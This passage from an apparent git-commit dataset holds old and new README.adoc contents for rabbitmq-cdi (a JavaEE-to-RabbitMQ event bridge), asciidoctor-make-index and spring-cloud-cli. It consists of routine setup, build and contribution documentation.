<3>\n bind(EventOne.class)\n .toExchange(\"test.exchange.two\")\n .withRoutingKey(\"test.key\")\n .withEncoder(new MyCustomEncoder()); \/\/ <4>\n\n bind(EventTwo.class)\n .toQueue(\"test.queue\");\n bind(EventTwo.class)\n .toQueue(\"test.queue\")\n .withDecoder(new MyCustomDecoder())\n .withDeclaration(testQueue)\n .autoAck(); \/\/ <5>\n }\n}\n----\n<1> Create exchange declaration for exchange with name 'test.exchange.one' and type 'direct'\n<2> Creates queue declaration for queue with name 'test.queue'\n<3> Uses an empty routing key for exchange 'test.exchange.one' and adds exchange declaration for this publisher\n<4> Specifies a custom event encoder\n<5> Specifies a custom event decoder, enables auto acknowledge and adds queue declaration for this consumer\n\nNote to declarations:\n\nCreated declarations are not automatically declared on broker side.\nFor each consumer\/producer own channels exist because of that reason it is necessary to\nadd the declaration needed to a binding via .withDeclaration(..)\nOnly these declarations are applied for this consumer\/producer\n\n\nAs last step you need to initialize the binder either in a singleton\nstartup bean or servlet after having also configured the connection settings:\n\n[source,java]\n----\n@Singleton\n@Startup\npublic class BindingInitializer {\n @Inject\n private RabbitBinder binder;\n\n @PostConstruct\n public void initialize() {\n try {\n binder.configuration()\n .addHost(\"somehost.somedomain\") \/\/ <1>\n .setUsername(\"myuser\") \/\/ <2>\n .setPassword(\"mypassword\"); \/\/ <3>\n .setSecure(true) \/\/ <4>\n .setConnectTimeout(10000) \/\/ <5>\n .setConnectRetryWaitTime(10000) \/\/ <6>\n .setRequestedConnectionHeartbeatTimeout(3) \/\/ <7>\n .withPrefetchCount(5); \/\/8\n binder.initialize();\n } catch (IOException e) {\n LoggerFactory.getLogger(getClass()).error(\"Unable to initialize\", e);\n }\n }\n}\n----\n<1> Specifies a AMQP host name (there can be added more than one here)\n<2> Specifies a connection user name\n<3> Specifies a connection password\n<4> Enables the transport layer security (TLS)\n<5> Sets the connect timeout to 10 sec\n<6> Set the time to wait between connection retries to 10 sec\n<7> Set the heartbeat timeout to 3 sec (To detect connection problems)\n<8> Set the prefetch count which configures how many messages are downloaded at once from broker\n\n\n=== Alternative connection definition\n\nAlternatively the connection can also be configured using a respective URI\nstring:\n\n[source,java]\n----\n@Singleton\n@Startup\npublic class BindingInitializer {\n @Inject\n private RabbitBinder binder;\n\n @PostConstruct\n public void initialize() {\n try {\n binder.configuration()\n .setUri(\"amqp:\/\/user:mysecret@somehost.somedomain\/virtualhost\"); \/\/ <1>\n binder.initialize();\n } catch (IOException e) {\n LoggerFactory.getLogger(getClass()).error(\"Unable to initialize\", e);\n }\n }\n}\n----\n<1> Specifies a AMQP connection URI\n\nMore information about the detailed URI can be found in the\nhttps:\/\/www.rabbitmq.com\/uri-spec.html[RabbitMQ URI specification].\n\n\n=== Multiple server connections\n\nIn case you have to support two different servers, create a binder implementation\nfor each host and initialize them in one single binding initializer:\n\n[source,java]\n----\n@Singleton\n@Startup\npublic class BindingInitializer {\n @Inject\n private RabbitBinder binderOne;\n @Inject\n private RabbitBinder binderTwo;\n\n @PostConstruct\n public void initialize() {\n try {\n binderOne.configuration()\n .addHost(\"hostOne.somedomain\")\n .setUsername(\"myuser\")\n .setPassword(\"mypassword\");\n binderTwo.configuration()\n .addHost(\"hostTwo.somedomain\")\n .setUsername(\"myuser\")\n .setPassword(\"mypassword\");\n \n binderOne.initialize();\n binderTwo.initialize();\n } catch (IOException e) {\n LoggerFactory.getLogger(getClass()).error(\"Unable to initialize\", e);\n }\n }\n}\n----\n\n\n=== Usage in a container\n\nNow the events can be used within your JavaEE container:\n\nsource,java]\n----\npublic class EventDemoBean {\n @Inject\n private Event<EventOne> eventOnes;\n \n public void submitEvent(boolean enabled) {\n EventOne eventOne = new EventOne();\n eventOne.setEnabled(enabled);\n eventOnes.fire(eventOne);\n }\n\n public void receiveEvent(@Observes EventTwo eventTwo) {\n String data = eventTwo.getData();\n \/\/ do some work\n }\n}\n----\n\n\n== Contribute\n\nContributions are always welcome. Use https:\/\/google.github.io\/styleguide\/javaguide.html[Google code style format] for your changes. \n\n== License\n\nThis project is licensed under the https:\/\/github.com\/{project-full-path}\/blob\/{github-branch}\/LICENSE[MIT license]","old_contents":"= Provides a JavaEE Event <--> RabbitMQ bridge.\nPatrick Reinhart <https:\/\/github.com\/reinhapa[@reinhapa]>\n:project-full-path: reinhapa\/rabbitmq-cdi\n:github-branch: master\n\nimage:https:\/\/img.shields.io\/badge\/license-MIT-blue.svg[\"MIT License\", link=\"https:\/\/github.com\/{project-full-path}\/blob\/{github-branch}\/LICENSE\"]\nimage:https:\/\/img.shields.io\/badge\/Java-8-blue.svg[\"Supported Versions\", link=\"https:\/\/travis-ci.org\/{project-full-path}\"]\nimage:https:\/\/img.shields.io\/badge\/Java-9-blue.svg[\"Supported Versions\", link=\"https:\/\/travis-ci.org\/{project-full-path}\"]\nimage:https:\/\/img.shields.io\/badge\/Java-10-blue.svg[\"Supported Versions\", link=\"https:\/\/travis-ci.org\/{project-full-path}\"]\nimage:https:\/\/img.shields.io\/badge\/Java-11-blue.svg[\"Supported Versions\", link=\"https:\/\/travis-ci.org\/{project-full-path}\"]\nimage:https:\/\/img.shields.io\/badge\/Java-12-blue.svg[\"Supported Versions\", link=\"https:\/\/travis-ci.org\/{project-full-path}\"]\nimage:https:\/\/img.shields.io\/github\/release\/{project-full-path}.svg[\"Release\", link=\"https:\/\/github.com\/{project-full-path}\"]\nimage:https:\/\/img.shields.io\/maven-central\/v\/net.reini\/rabbitmq-cdi.svg?label=Maven%20Central[\"Maven Central\", link=\"https:\/\/search.maven.org\/search?q=g:%22net.reini%22%20AND%20a:%22rabbitmq-cdi%22\"]\nimage:https:\/\/img.shields.io\/travis\/{project-full-path}\/{github-branch}.svg[\"Build Status\", link=\"https:\/\/travis-ci.org\/{project-full-path}\"]\nimage:https:\/\/img.shields.io\/codecov\/c\/github\/{project-full-path}\/{github-branch}.svg[\"Code Coverage\", link=\"https:\/\/codecov.io\/github\/{project-full-path}?branch={github-branch}\"]\nimage:https:\/\/codecov.io\/github\/{project-full-path}\/branch.svg?branch={github-branch}[codecov.io]\n\nThis project contains all needed classes to bind JavaEE enterprise events to a\nRabbitMQ exchange for outgoing events. Inbound events can also be bound to the\nrespective queues and will be handed over to all JavaEE event observers.\n\nThe RabbitMQ message content is done via JSON serialization of a Java Bean \ncompatible PoJo object and vice versa.\n\n== Usage example\n\nFirst you need to define event objects using standard Java Bean syntax:\n\n[source,java]\n----\npublic class EventOne {\n private boolean enabled;\n\n public boolean isEnabled() {\n return enabled;\n }\n\n public void setEnabled(boolean enabled) {\n this.enabled = enabled;\n }\n}\n\npublic class EventTwo {\n private String value;\n\n public String getValue() {\n return value;\n }\n\n public void setValue(String value) {\n this.value = value;\n }\n}\n----\n\n\nAs second step you have to define the bindings:\n\n[source,java]\n----\n@Dependent\npublic class RabbitBinder extends EventBinder {\n @Override\n protected void bindEvents() {\n\n ExchangeDeclaration testExchangeOne = declarerFactory()\n .createExchangeDeclaration(\"test.exchange.one\")\n .withExchangeType(BuiltinExchangeType.DIRECT)\n .withAutoDelete(false)\n .withDurable(false); \/\/ <1>\n\n QueueDeclaration testQueue = declarerFactory()\n .createQueueDeclaration(\"test.queue\")\n .withAutoDelete(false)\n .withDurable(false)\n .withExclusiveAccess(false); \/\/ <2>\n\n bind(EventOne.class)\n .toExchange(\"test.exchange.one\");\n .withDeclaration(testExchangeOne) \/\/ <3>\n bind(EventOne.class)\n .toExchange(\"test.exchange.two\")\n .withRoutingKey(\"test.key\")\n .withEncoder(new MyCustomEncoder()); \/\/ <4>\n\n bind(EventTwo.class)\n .toQueue(\"test.queue\");\n bind(EventTwo.class)\n .toQueue(\"test.queue\")\n .withDecoder(new MyCustomDecoder())\n .withDeclaration(testQueue)\n .autoAck(); \/\/ <5>\n }\n}\n----\n<1> Create exchange declaration for exchange with name 'test.exchange.one' and type 'direct'\n<2> Creates queue declaration for queue with name 'test.queue'\n<3> Uses an empty routing key for exchange 'test.exchange.one' and adds exchange declaration for this publisher\n<4> Specifies a custom event encoder\n<5> Specifies a custom event decoder, enables auto acknowledge and adds queue declaration for this consumer\n\nNote to declarations:\n\nCreated declarations are not automatically declared on broker side.\nFor each consumer\/producer own channels exist because of that reason it is necessary to\nadd the declaration needed to a binding via .withDeclaration(..)\nOnly these declarations are applied for this consumer\/producer\n\n\nAs last step you need to initialize the binder either in a singleton\nstartup bean or servlet after having also configured the connection settings:\n\n[source,java]\n----\n@Singleton\n@Startup\npublic class BindingInitializer {\n @Inject\n private RabbitBinder binder;\n\n @PostConstruct\n public void initialize() {\n try {\n binder.configuration()\n .addHost(\"somehost.somedomain\") \/\/ <1>\n .setUsername(\"myuser\") \/\/ <2>\n .setPassword(\"mypassword\"); \/\/ <3>\n .setSecure(true) \/\/ <4>\n .setConnectTimeout(10000) \/\/ <5>\n .setConnectRetryWaitTime(10000) \/\/ <6>\n .setRequestedConnectionHeartbeatTimeout(3) \/\/ <7>\n .withPrefetchCount(5); \/\/8\n binder.initialize();\n } catch (IOException e) {\n LoggerFactory.getLogger(getClass()).error(\"Unable to initialize\", e);\n }\n }\n}\n----\n<1> Specifies a AMQP host name (there can be added more than one here)\n<2> Specifies a connection user name\n<3> Specifies a connection password\n<4> Enables the transport layer security (TLS)\n<5> Sets the connect timeout to 10 sec\n<6> Set the time to wait between connection retries to 10 sec\n<7> Set the heartbeat timeout to 3 sec (To detect connection problems)\n<8> Set the prefetch count which configures how many messages are downloaded at once from broker\n\n\n=== Alternative connection definition\n\nAlternatively the connection can also be configured using a respective URI\nstring:\n\n[source,java]\n----\n@Singleton\n@Startup\npublic class BindingInitializer {\n @Inject\n private RabbitBinder binder;\n\n @PostConstruct\n public void initialize() {\n try {\n binder.configuration()\n .setUri(\"amqp:\/\/user:mysecret@somehost.somedomain\/virtualhost\"); \/\/ <1>\n binder.initialize();\n } catch (IOException e) {\n LoggerFactory.getLogger(getClass()).error(\"Unable to initialize\", e);\n }\n }\n}\n----\n<1> Specifies a AMQP connection URI\n\nMore information about the detailed URI can be found in the\nhttps:\/\/www.rabbitmq.com\/uri-spec.html[RabbitMQ URI specification].\n\n\n=== Multiple server connections\n\nIn case you have to support two different servers, create a binder implementation\nfor each host and initialize them in one single binding initializer:\n\n[source,java]\n----\n@Singleton\n@Startup\npublic class BindingInitializer {\n @Inject\n private RabbitBinder binderOne;\n @Inject\n private RabbitBinder binderTwo;\n\n @PostConstruct\n public void initialize() {\n try {\n binderOne.configuration()\n .addHost(\"hostOne.somedomain\")\n .setUsername(\"myuser\")\n .setPassword(\"mypassword\");\n binderTwo.configuration()\n .addHost(\"hostTwo.somedomain\")\n .setUsername(\"myuser\")\n .setPassword(\"mypassword\");\n \n binderOne.initialize();\n binderTwo.initialize();\n } catch (IOException e) {\n LoggerFactory.getLogger(getClass()).error(\"Unable to initialize\", e);\n }\n }\n}\n----\n\n\n=== Usage in a container\n\nNow the events can be used within your JavaEE container:\n\nsource,java]\n----\npublic class EventDemoBean {\n @Inject\n private Event<EventOne> eventOnes;\n \n public void submitEvent(boolean enabled) {\n EventOne eventOne = new EventOne();\n eventOne.setEnabled(enabled);\n eventOnes.fire(eventOne);\n }\n\n public void receiveEvent(@Observes EventTwo eventTwo) {\n String data = eventTwo.getData();\n \/\/ do some work\n }\n}\n----\n\n\n== Contribute\n\nContributions are always welcome. Use https:\/\/google.github.io\/styleguide\/javaguide.html[Google code style format] for your changes. \n\n== License\n\nThis project is licensed under the https:\/\/github.com\/{project-full-path}\/blob\/{github-branch}\/LICENSE[MIT license]","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"95f769f7b20f030780955ba38d5297fd62daa63d","subject":"Improve README","message":"Improve README\n","repos":"jxxcarlson\/asciidoctor-make-index","old_file":"README.adoc","new_file":"README.adoc","new_contents":"== Making an Index\n\n`make_index` is a Ruby program for generating\nan index for Asciidoc documents. At the\nmoment it requires the `Asciidoctor-LaTeX` extension.\n\n\n\n\nMark terms like this if you want them to appear\nin the document index:\n----\n ((potrezebie))\n----\nAssuming that your document is `foo.adoc`, do\nthis to make a version with an index:\n----\n $ ruby make_index.rb ..\/examples\/foo.adoc\n----\nExecution of this command produces\ntwo files, `foo-indexed.adoc`\nand `foo-indexed.html`. Here we assume\nthat you in the directory `make_index\/lib`.\n\nhttps:\/\/vschool.s3.amazonaws.com\/manuscripts\/462.html[Here]\nis an example of an Asciidoc document compiled\nwith an index. And\nhttp:\/\/www.noteshare.io\/lessons\/index-example-1?remote=true&view_mode=source[here]\nis a place to view the source text if you are\nlogged in to Noteshare. If you wish,\nyou can sign up for\na free account at\nhttp:\/\/www.noteshare.io[Noteshare.io].\n\n\n.Larger Example\nFor testing purposes, the 5900-word file\n`keynes_ch_2.adoc` is included.\nIt has a few terms marked marked for the\nindex. To play with it, do this:\n----\n $ ruby make_index.rb ..\/examples\/keynes_ch_2.adoc\n----\nThen view the file `keynes_ch_2-indexed.html`\nin your browser.\n\n=== Installation\n\n.Download from GitHub\n----\n $ git clone https:\/\/github.com\/jxxcarlson\/asciidoctor-make-index\n $ https:\/\/github.com\/asciidoctor\/asciidoctor-latex\n $ cd asciidoctor-latex\n $ rake install\n----\n\nRun tests with `rspec spec\/make_index_spec.rb`.\n\n.Stopgap\nUntil I get things properly set up build and install\na gem, you should also\nsay\n\n----\nalias makeindex=\"ruby $HOME\/dev\/git\/asciidoctor-make-index\/lib\/make_index.rb\"\n----\n\nThen you can run `make-index foo.adoc` from anywhere.\n\n.Help needed\nWhen I run `rake install`, the gem is installed\nas `make_index (0.1.0)` (verified)\nby running `gem list`). but when I run `$ make_index foo.adoc`\nI get the error 'make_index: command not found'\n\n=== Notes\n\n. The index feature of Asciidoctor-LaTeX experimental.\nIt is designed to be syntax-compatible with the\ncorresponding feature for Asciidoctor when\nit is released. At that point,\n`make_index.rb` will be redundant.\n. The index feature has beeb rolled into\nhttp:\/\/www.noteshare.io[Noteshare.io]. The *Show Doc*\nitem in the *View* menu will compile the current notebook\nwith an index if the attribute `:make_index:` is set.\nSee http:\/\/www.noteshare.io\/section\/writing-tools#_index[this document]\n","old_contents":"== Making an Index\n\n`make_index` is a Ruby program for generating\nan index for Asciidoc documents. At the\nmoment it requires the `Asciidoctor-LaTeX` extension.\n\n\nMark terms like this if you want them to appear\nin the document index:\n----\n ((potrezebie))\n----\nAssuming that your document is `foo.adoc`, do\nthis to make a version with an index:\n----\n $ ruby make_index.rb ..\/examples\/foo.adoc\n----\nExecution of this command produces\ntwo files, `foo-indexed.adoc`\nand `foo-indexed.html`. Here we assume\nthat you in the directory `make_index\/lib`.\n\n\n.Larger Example\nFor testing purposes, the 5900-word file\n`keynes_ch_2.adoc` is included.\nIt has a few terms marked marked for the\nindex. To play with it, do this:\n----\n $ ruby make_index.rb ..\/examples\/keynes_ch_2.adoc\n----\nThen view the file `keynes_ch_2-indexed.html`\nin your browser.\n\n=== Installation\n\n.Download from GitHub\n----\n $ git clone https:\/\/github.com\/jxxcarlson\/asciidoctor-make-index\n $ https:\/\/github.com\/asciidoctor\/asciidoctor-latex\n $ cd asciidoctor-latex\n $ rake install\n----\n\nRun tests with `rspec spec\/make_index_spec.rb`.\n\n.Stopgap\nUntil I get things properly set up build and install\na gem, you should also\nsay\n\n----\nalias makeindex=\"ruby $HOME\/dev\/git\/asciidoctor-make-index\/lib\/make_index.rb\"\n----\n\nThen you can run `make-index foo.adoc` from anywhere.\n\n.Help needed\nWhen I run `rake install`, the gem is installed\nas `make_index (0.1.0)` (verified)\nby running `gem list`). but when I run `$ make_index foo.adoc`\nI get the error 'make_index: command not found'\n\n=== Notes\n\n. The index feature of Asciidoctor-LaTeX experimental.\nIt is designed to be syntax-compatible with the\ncorresponding feature for Asciidoctor when\nit is released. At that point,\n`make_index.rb` will be redundant.\n. The index feature has beeb rolled into\nhttp:\/\/www.noteshare.io[Noteshare.io]. The *Show Doc*\nitem in the *View* menu will compile the current notebook\nwith an index if the attribute `:make_index:` is set.\nSee http:\/\/www.noteshare.io\/section\/writing-tools#_index[this document]\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"9be47f709bb3c3e3e65fb1ea9deb42bbaf00dcef","subject":"Update readme for code of conduct.","message":"Update readme for code of conduct.\n\nhttps:\/\/github.com\/spring-cloud\/spring-cloud-build\/issues\/26\n","repos":"spring-cloud\/spring-cloud-cli,spring-cloud\/spring-cloud-cli","old_file":"README.adoc","new_file":"README.adoc","new_contents":"\/\/ Do not edit this file (e.g. go instead to docs\/src\/main\/asciidoc)\n\nimage::https:\/\/travis-ci.org\/spring-cloud\/spring-cloud-cli.svg?branch=master[Build Status, link=https:\/\/travis-ci.org\/spring-cloud\/spring-cloud-cli]\n\nSpring Boot CLI provides http:\/\/projects.spring.io\/spring-boot[Spring Boot] command line features for\nhttps:\/\/github.com\/spring-cloud[Spring Cloud]. You can write Groovy scripts to run Spring Cloud component applications\n(e.g. `@EnableEurekaServer`). You can also easily do things like encryption and decryption to support Spring Cloud\nConfig clients with secret configuration values.\n\n\n== Installation\n\nTo install, make\nsure you have\nhttps:\/\/github.com\/spring-projects\/spring-boot[Spring Boot CLI]\n(1.2.0 or better):\n\n $ spring version\n Spring CLI v1.2.3.RELEASE\n\nE.g. for GVM users\n\n```\n$ gvm install springboot 1.3.0.M5\n$ gvm use springboot 1.3.0.M5\n```\n\nand install the Spring Cloud plugin:\n\n```\n$ mvn install\n$ spring install org.springframework.cloud:spring-cloud-cli:1.1.0.BUILD-SNAPSHOT\n```\n\nIMPORTANT: **Prerequisites:** to use the encryption and decryption features\nyou need the full-strength JCE installed in your JVM (it's not there by default).\nYou can download the \"Java Cryptography Extension (JCE) Unlimited Strength Jurisdiction Policy Files\"\nfrom Oracle, and follow instructions for installation (essentially replace the 2 policy files\nin the JRE lib\/security directory with the ones that you downloaded).\n\n== Building\n\n:jdkversion: 1.7\n\n=== Basic Compile and Test\n\nTo build the source you will need to install JDK {jdkversion}.\n\nSpring Cloud uses Maven for most build-related activities, and you\nshould be able to get off the ground quite quickly by cloning the\nproject you are interested in and typing\n\n----\n$ .\/mvnw install\n----\n\nNOTE: You can also install Maven (>=3.3.3) yourself and run the `mvn` command\nin place of `.\/mvnw` in the examples below. If you do that you also\nmight need to add `-P spring` if your local Maven settings do not\ncontain repository declarations for spring pre-release artifacts.\n\nNOTE: Be aware that you might need to increase the amount of memory\navailable to Maven by setting a `MAVEN_OPTS` environment variable with\na value like `-Xmx512m -XX:MaxPermSize=128m`. We try to cover this in\nthe `.mvn` configuration, so if you find you have to do it to make a\nbuild succeed, please raise a ticket to get the settings added to\nsource control.\n\nFor hints on how to build the project look in `.travis.yml` if there\nis one. There should be a \"script\" and maybe \"install\" command. Also\nlook at the \"services\" section to see if any services need to be\nrunning locally (e.g. mongo or rabbit). Ignore the git-related bits\nthat you might find in \"before_install\" since they're related to setting git\ncredentials and you already have those.\n\nThe projects that require middleware generally include a\n`docker-compose.yml`, so consider using\nhttp:\/\/compose.docker.io\/[Docker Compose] to run the middeware servers\nin Docker containers. See the README in the\nhttps:\/\/github.com\/spring-cloud-samples\/scripts[scripts demo\nrepository] for specific instructions about the common cases of mongo,\nrabbit and redis.\n\nNOTE: If all else fails, build with the command from `.travis.yml` (usually\n`.\/mvnw install`).\n\n=== Documentation\n\nThe spring-cloud-build module has a \"docs\" profile, and if you switch\nthat on it will try to build asciidoc sources from\n`src\/main\/asciidoc`. As part of that process it will look for a\n`README.adoc` and process it by loading all the includes, but not\nparsing or rendering it, just copying it to `${main.basedir}`\n(defaults to `${basedir}`, i.e. the root of the project). If there are\nany changes in the README it will then show up after a Maven build as\na modified file in the correct place. Just commit it and push the change.\n\n=== Working with the code\nIf you don't have an IDE preference we would recommend that you use\nhttp:\/\/www.springsource.com\/developer\/sts[Spring Tools Suite] or\nhttp:\/\/eclipse.org[Eclipse] when working with the code. We use the\nhttp:\/\/eclipse.org\/m2e\/[m2eclipe] eclipse plugin for maven support. Other IDEs and tools\nshould also work without issue.\n\n==== Importing into eclipse with m2eclipse\nWe recommend the http:\/\/eclipse.org\/m2e\/[m2eclipe] eclipse plugin when working with\neclipse. If you don't already have m2eclipse installed it is available from the \"eclipse\nmarketplace\".\n\nUnfortunately m2e does not yet support Maven 3.3, so once the projects\nare imported into Eclipse you will also need to tell m2eclipse to use\nthe `.settings.xml` file for the projects. If you do not do this you\nmay see many different errors related to the POMs in the\nprojects. Open your Eclipse preferences, expand the Maven\npreferences, and select User Settings. In the User Settings field\nclick Browse and navigate to the Spring Cloud project you imported\nselecting the `.settings.xml` file in that project. Click Apply and\nthen OK to save the preference changes.\n\nNOTE: Alternatively you can copy the repository settings from https:\/\/github.com\/spring-cloud\/spring-cloud-build\/blob\/master\/.settings.xml[`.settings.xml`] into your own `~\/.m2\/settings.xml`.\n\n==== Importing into eclipse without m2eclipse\nIf you prefer not to use m2eclipse you can generate eclipse project metadata using the\nfollowing command:\n\n[indent=0]\n----\n\t$ .\/mvnw eclipse:eclipse\n----\n\nThe generated eclipse projects can be imported by selecting `import existing projects`\nfrom the `file` menu.\n\n==== Adding Project Lombok Agent\n\nSpring Cloud uses http:\/\/projectlombok.org\/features\/index.html[Project Lombok]\nto generate getters and setters etc. Compiling from the command line this\nshouldn't cause any problems, but in an IDE you need to add an agent\nto the JVM. Full instructions can be found in the Lombok website. The\nsign that you need to do this is a lot of compiler errors to do with\nmissing methods and fields, e.g.\n\n[indent=0]\n----\nThe method getInitialStatus() is undefined for the type EurekaInstanceConfigBean EurekaDiscoveryClientConfiguration.java \/spring-cloud-netflix-core\/src\/main\/java\/org\/springframework\/cloud\/netflix\/eureka line 120 Java Problem\nThe method getInitialStatus() is undefined for the type EurekaInstanceConfigBean EurekaDiscoveryClientConfiguration.java \/spring-cloud-netflix-core\/src\/main\/java\/org\/springframework\/cloud\/netflix\/eureka line 121 Java Problem\nThe method setNonSecurePort(int) is undefined for the type EurekaInstanceConfigBean EurekaDiscoveryClientConfiguration.java \/spring-cloud-netflix-core\/src\/main\/java\/org\/springframework\/cloud\/netflix\/eureka line 112 Java Problem\nThe type EurekaInstanceConfigBean.IdentifyingDataCenterInfo must implement the inherited abstract method DataCenterInfo.getName() EurekaInstanceConfigBean.java \/spring-cloud-netflix-core\/src\/main\/java\/org\/springframework\/cloud\/netflix\/eureka line 131 Java Problem\nThe method getId() is undefined for the type ProxyRouteLocator.ProxyRouteSpec PreDecorationFilter.java \/spring-cloud-netflix-core\/src\/main\/java\/org\/springframework\/cloud\/netflix\/zuul\/filters\/pre line 60 Java Problem\nThe method getLocation() is undefined for the type ProxyRouteLocator.ProxyRouteSpec PreDecorationFilter.java \/spring-cloud-netflix-core\/src\/main\/java\/org\/springframework\/cloud\/netflix\/zuul\/filters\/pre line 55 Java Problem\n----\n\n==== Importing into Intellij\nSpring Cloud projects use annotation processing, particularly Lombok, which requires configuration\nor you will encounter compile problems. It also needs a specific version of maven and a profile\nenabled. Intellij 14.1+ requires some configuration to ensure these are setup properly.\n\n 1. Click Preferences, Plugins. *Ensure Lombok is installed*\n 2. Click New, Project from Existing Sources, choose your spring-cloud-sleuth directory\n 3. Choose Maven, and select Environment Settings. *Ensure you are using Maven 3.3.3*\n 4. In the next screen, *Select the profile `spring`* click Next until Finish.\n 5. Click Preferences, \"Build, Execution, Deployment\", Compiler, Annotation Processors. *Click Enable Annotation Processing*\n 6. Click Build, Rebuild Project, and you are ready to go!\n\n==== Importing into other IDEs\nMaven is well supported by most Java IDEs. Refer to you vendor documentation.\n\n\n== Contributing\n\nSpring Cloud is released under the non-restrictive Apache 2.0 license,\nand follows a very standard Github development process, using Github\ntracker for issues and merging pull requests into master. If you want\nto contribute even something trivial please do not hesitate, but\nfollow the guidelines below.\n\n=== Sign the Contributor License Agreement\nBefore we accept a non-trivial patch or pull request we will need you to sign the\nhttps:\/\/support.springsource.com\/spring_committer_signup[contributor's agreement].\nSigning the contributor's agreement does not grant anyone commit rights to the main\nrepository, but it does mean that we can accept your contributions, and you will get an\nauthor credit if we do. Active contributors might be asked to join the core team, and\ngiven the ability to merge pull requests.\n\n=== Code of Conduct\nThis project adheres to the Contributor Covenant https:\/\/github.com\/spring-cloud\/spring-cloud-build\/blob\/master\/docs\/src\/main\/asciidoc\/code-of-conduct.adoc[code of\nconduct]. By participating, you are expected to uphold this code. Please report\nunacceptable behavior to spring-code-of-conduct@pivotal.io.\n\n=== Code Conventions and Housekeeping\nNone of these is essential for a pull request, but they will all help. They can also be\nadded after the original pull request but before a merge.\n\n* Use the Spring Framework code format conventions. If you use Eclipse\n you can import formatter settings using the\n `eclipse-code-formatter.xml` file from the\n https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-dependencies-parent\/eclipse-code-formatter.xml[Spring\n Cloud Build] project. If using IntelliJ, you can use the\n http:\/\/plugins.jetbrains.com\/plugin\/6546[Eclipse Code Formatter\n Plugin] to import the same file.\n* Make sure all new `.java` files to have a simple Javadoc class comment with at least an\n `@author` tag identifying you, and preferably at least a paragraph on what the class is\n for.\n* Add the ASF license header comment to all new `.java` files (copy from existing files\n in the project)\n* Add yourself as an `@author` to the .java files that you modify substantially (more\n than cosmetic changes).\n* Add some Javadocs and, if you change the namespace, some XSD doc elements.\n* A few unit tests would help a lot as well -- someone has to do it.\n* If no-one else is using your branch, please rebase it against the current master (or\n other target branch in the main project).\n* When writing a commit message please follow http:\/\/tbaggery.com\/2008\/04\/19\/a-note-about-git-commit-messages.html[these conventions],\n if you are fixing an existing issue please add `Fixes gh-XXXX` at the end of the commit\n message (where XXXX is the issue number).","old_contents":"\/\/ Do not edit this file (e.g. go instead to docs\/src\/main\/asciidoc)\n\nimage::https:\/\/travis-ci.org\/spring-cloud\/spring-cloud-cli.svg?branch=master[Build Status, link=https:\/\/travis-ci.org\/spring-cloud\/spring-cloud-cli]\n\nSpring Boot CLI provides http:\/\/projects.spring.io\/spring-boot[Spring Boot] command line features for\nhttps:\/\/github.com\/spring-cloud[Spring Cloud]. You can write Groovy scripts to run Spring Cloud component applications\n(e.g. `@EnableEurekaServer`). You can also easily do things like encryption and decryption to support Spring Cloud\nConfig clients with secret configuration values.\n\n\n== Installation\n\nTo install, make\nsure you have\nhttps:\/\/github.com\/spring-projects\/spring-boot[Spring Boot CLI]\n(1.2.0 or better):\n\n $ spring version\n Spring CLI v1.2.3.RELEASE\n\nE.g. for GVM users\n\n```\n$ gvm install springboot 1.3.0.M5\n$ gvm use springboot 1.3.0.M5\n```\n\nand install the Spring Cloud plugin:\n\n```\n$ mvn install\n$ spring install org.springframework.cloud:spring-cloud-cli:1.1.0.BUILD-SNAPSHOT\n```\n\nIMPORTANT: **Prerequisites:** to use the encryption and decryption features\nyou need the full-strength JCE installed in your JVM (it's not there by default).\nYou can download the \"Java Cryptography Extension (JCE) Unlimited Strength Jurisdiction Policy Files\"\nfrom Oracle, and follow instructions for installation (essentially replace the 2 policy files\nin the JRE lib\/security directory with the ones that you downloaded).\n\n== Building\n\n:jdkversion: 1.7\n\n=== Basic Compile and Test\n\nTo build the source you will need to install JDK {jdkversion}.\n\nSpring Cloud uses Maven for most build-related activities, and you\nshould be able to get off the ground quite quickly by cloning the\nproject you are interested in and typing\n\n----\n$ .\/mvnw install\n----\n\nNOTE: You can also install Maven (>=3.3.3) yourself and run the `mvn` command\nin place of `.\/mvnw` in the examples below. If you do that you also\nmight need to add `-P spring` if your local Maven settings do not\ncontain repository declarations for spring pre-release artifacts.\n\nNOTE: Be aware that you might need to increase the amount of memory\navailable to Maven by setting a `MAVEN_OPTS` environment variable with\na value like `-Xmx512m -XX:MaxPermSize=128m`. We try to cover this in\nthe `.mvn` configuration, so if you find you have to do it to make a\nbuild succeed, please raise a ticket to get the settings added to\nsource control.\n\nFor hints on how to build the project look in `.travis.yml` if there\nis one. There should be a \"script\" and maybe \"install\" command. Also\nlook at the \"services\" section to see if any services need to be\nrunning locally (e.g. mongo or rabbit). Ignore the git-related bits\nthat you might find in \"before_install\" since they're related to setting git\ncredentials and you already have those.\n\nThe projects that require middleware generally include a\n`docker-compose.yml`, so consider using\nhttp:\/\/compose.docker.io\/[Docker Compose] to run the middeware servers\nin Docker containers. See the README in the\nhttps:\/\/github.com\/spring-cloud-samples\/scripts[scripts demo\nrepository] for specific instructions about the common cases of mongo,\nrabbit and redis.\n\nNOTE: If all else fails, build with the command from `.travis.yml` (usually\n`.\/mvnw install`).\n\n=== Documentation\n\nThe spring-cloud-build module has a \"docs\" profile, and if you switch\nthat on it will try to build asciidoc sources from\n`src\/main\/asciidoc`. As part of that process it will look for a\n`README.adoc` and process it by loading all the includes, but not\nparsing or rendering it, just copying it to `${main.basedir}`\n(defaults to `${basedir}`, i.e. the root of the project). If there are\nany changes in the README it will then show up after a Maven build as\na modified file in the correct place. Just commit it and push the change.\n\n=== Working with the code\nIf you don't have an IDE preference we would recommend that you use\nhttp:\/\/www.springsource.com\/developer\/sts[Spring Tools Suite] or\nhttp:\/\/eclipse.org[Eclipse] when working with the code. We use the\nhttp:\/\/eclipse.org\/m2e\/[m2eclipe] eclipse plugin for maven support. Other IDEs and tools\nshould also work without issue.\n\n==== Importing into eclipse with m2eclipse\nWe recommend the http:\/\/eclipse.org\/m2e\/[m2eclipe] eclipse plugin when working with\neclipse. If you don't already have m2eclipse installed it is available from the \"eclipse\nmarketplace\".\n\nUnfortunately m2e does not yet support Maven 3.3, so once the projects\nare imported into Eclipse you will also need to tell m2eclipse to use\nthe `.settings.xml` file for the projects. If you do not do this you\nmay see many different errors related to the POMs in the\nprojects. Open your Eclipse preferences, expand the Maven\npreferences, and select User Settings. In the User Settings field\nclick Browse and navigate to the Spring Cloud project you imported\nselecting the `.settings.xml` file in that project. 